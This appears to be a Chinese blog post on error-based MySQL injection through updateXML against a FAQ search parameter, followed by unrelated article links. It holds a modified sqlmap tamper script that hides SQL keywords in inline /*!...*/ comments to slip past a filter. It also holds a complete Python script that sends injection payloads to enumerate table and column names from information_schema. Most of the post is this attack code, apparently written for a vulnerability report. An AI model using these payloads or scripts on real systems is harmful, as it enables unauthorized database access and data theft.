updateXML 注入 python 脚本

用SLQMAP来跑updateXML注入发现拦截关键字，然后内联注入能绕，最后修改halfversionedmorekeywords.py脚本，结果SQLMAP还是跑不出来。>_<

halfversionedmorekeywords.py脚本修改后如下：

#!/usr/bin/env python


import os
import re

from lib.core.common import singleTimeWarnMessage
from lib.core.data import kb
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS

__priority__ = PRIORITY.HIGHER

def dependencies():
    singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))

def tamper(payload, **kwargs):

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
            return match.group().replace(word, "/*!12345 %s*/" % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"(?<=W)(?P<word>[A-Za-z_]+)(?=W|)", lambda match: process(match), retVal)
        retVal = retVal.replace(" /*!0", "/*!0")

    return retVal

自己写个脚本得了，于是有了以下代码，成功跑出表名和字段。

#coding=utf-8


import requests
import re, binascii, warnings, time
warnings.filterwarnings("ignore")


table_name_list = []

for k in range(1,112):
    #遍历表名
    url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&" 
          "searchopt=content&searchkey=1' /*!and*//*!updateXML*/" 
          "(1,concat(0x7e, (select /*!table_name*/ /*!from*/ information_schema.tables limit " + str(k) + ",1),0x7e),3)-- -" 
          "&x=4&y=23"

    req = requests.get(url)

    a = re.findall(r"'~(.*)~'", req.text)

    if a:table_name_list.append(a[0])
    else:pass

print table_name_list

for i in  table_name_list:
    print u"表名为：",i #输出表名
    #遍历字长度
    url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" 
          "' /*!and*//*!updateXML*/(1,concat(0x7e, " 
          "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!count(column_name)*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " 
          "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ ),0x7e),3)-- -&x=4&y=23"

    req = requests.get(url)

    b = re.findall(r"'~(.*)~'",req.text)

    if b:
        m = int(b[0].strip("~"))+1
        print u"行数为：",m #输出行数
        for n in range(1,m):
            #遍历字段名
            url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" 
                  "' /*!and*//*!updateXML*/(1,concat(0x7e, " 
                  "(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!column_name*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " 
                  "where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ limit "+str(n)+",1),0x7e),3)-- -&x=4&y=23"

            req = requests.get(url)

            c = re.findall(r"'~(.*)~'", req.text)
            if c:print u"字段：",str(c).strip("[u'~").strip("~']")
            else:pass
    else:pass

收工，提漏洞。拜拜。

相关阅读:
redux VS mobx (装饰器配合使用)
react-native 中使用 mobx
使用 react-native-tab-navigator 创建 TabBar 组件
 react-native ListView 封装实现下拉刷新/上拉加载更多
 react-native 路由 react-native-router-flux
react-native fetch 请求封装
 react-native flex 布局详解
 react-native AsyncStorage 数据持久化方案
 react-native 自定义下拉刷新 / 上拉加载更多组件
 用 Core Animation 实现图片的碎片化
原文地址：https://www.cnblogs.com/MiWhite/p/7062207.html

最新文章
C 循环
 C 判断
 C 运算符
 C 存储类
 C 变量
 C 数据类型
 C 基本语法
 C 程序结构
 "贪心法"
介绍css 的3D 变换（3D transform）